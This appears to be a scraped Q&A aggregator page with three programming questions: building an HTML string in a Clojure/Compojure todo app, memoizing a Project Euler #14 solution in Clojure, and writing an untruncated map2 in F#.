    Hi gang - [this may seem like my problem is with Compojure, but it isn't - it's with Clojure] I've been pulling my hair out on this seemingly simple issue - but am getting nowhere. I am playing with Compojure (a light web framework for Clojure) and I would just like to generate a web page showing showing my list of todos that are in a PostgreSQL database. The code snippets are below (left out the database connection, query, etc - but that part isn't needed because specific issue is that the resulting HTML shows nothing between the <body> and </body> tags). As a test, I tried hard-coding the string in the call to main-layout, like this: (html (main-layout "Aki's Todos" "Haircut<br>Study Clojure<br>Answer a question on Stackoverfolw")) - and it works fine. So the real issue is that I do not believe I know how to build up a string in Clojure. Not the idiomatic way, and not by calling out to Java's StringBuilder either - as I have attempted to do in the code below. A virtual beer, and a big upvote to whoever can solve it! Many thanks! ============================================================= ;The master template (a very simple POC for now, but can expand on it later) (defn main-layout "This is one of the html layouts for the pages assets - just like a master page" [title body] (html [:html [:head [:title title] (include-js "todos.js") (include-css "todos.css")] [:body body]])) (defn show-all-todos "This function will generate the todos HTML table and call the layout function" [] (let [rs (select-all-todos) sbHTML (new StringBuilder)] (for [rec rs] (.append sbHTML (str rec "<br><br>"))) (html (main-layout "Aki's Todos" (.toString sbHTML))))) ============================================================= Again, the result is a web page but with nothing between the body tags. If I replace the code in the for loop with println statements, and direct the code to the repl - forgetting about the web page stuff (ie. the call to main-layout), the resultset gets printed - BUT - the issue is with building up the string. Thanks again. ~Aki

    Read the article

  • Project Euler #14 and memoization in Clojure

    - by dbyrne
    As a neophyte clojurian, it was recommended to me that I go through the Project Euler problems as a way to learn the language. Its definitely a great way to improve your skills and gain confidence. I just finished up my answer to problem #14. It works fine, but to get it running efficiently I had to implement some memoization. I couldn't use the prepackaged memoize function because of the way my code was structured, and I think it was a good experience to roll my own anyways. My question is if there is a good way to encapsulate my cache within the function itself, or if I have to define an external cache like I have done. Also, any tips to make my code more idiomatic would be appreciated. (use 'clojure.test) (def mem (atom {})) (with-test (defn chain-length ([x] (chain-length x x 0)) ([start-val x c] (if-let [e (last(find @mem x))] (let [ret (+ c e)] (swap! mem assoc start-val ret) ret) (if (<= x 1) (let [ret (+ c 1)] (swap! mem assoc start-val ret) ret) (if (even? x) (recur start-val (/ x 2) (+ c 1)) (recur start-val (+ 1 (* x 3)) (+ c 1))))))) (is (= 10 (chain-length 13)))) (with-test (defn longest-chain ([] (longest-chain 2 0 0)) ([c max start-num] (if (>= c 1000000) start-num (let [l (chain-length c)] (if (> l max) (recur (+ 1 c) l c) (recur (+ 1 c) max start-num)))))) (is (= 837799 (longest-chain))))

    Read the article

  • Modified map2 (without truncation of lists) in F# - how to do it idiomatically?

    - by Maciej Piechotka
    I'd like to rewrite such function into F#: zipWith' :: (a -> b -> c) -> (a -> c) -> (b -> c) -> [a] -> [b] -> [c] zipWith' _ _ h [] bs = h `map` bs zipWith' _ g _ as [] = g `map` as zipWith' f g h (a:as) (b:bs) = f a b:zipWith f g h as bs My first attempt was: let inline private map2' (xs : seq<'T>) (ys : seq<'U>) (f : 'T -> 'U -> 'S) (g : 'T -> 'S) (h : 'U -> 'S) = let xenum = xs.GetEnumerator() let yenum = ys.GetEnumerator() seq { let rec rest (zenum : IEnumerator<'A>) (i : 'A -> 'S) = seq { yield i(zenum.Current) if zenum.MoveNext() then yield! (rest zenum i) else zenum.Dispose() } let rec merge () = seq { if xenum.MoveNext() then if yenum.MoveNext() then yield (f xenum.Current yenum.Current); yield! (merge ()) else yenum.Dispose(); yield! (rest xenum g) else xenum.Dispose() if yenum.MoveNext() then yield! (rest yenum h) else yenum.Dispose() } yield! (merge ()) } However it can hardly be considered idiomatic. I heard about LazyList but I cannot find it anywhere.

    Read the article

< Previous Page | 113 114 115 116 117 118 119 120 121 122 123 124  | Next Page >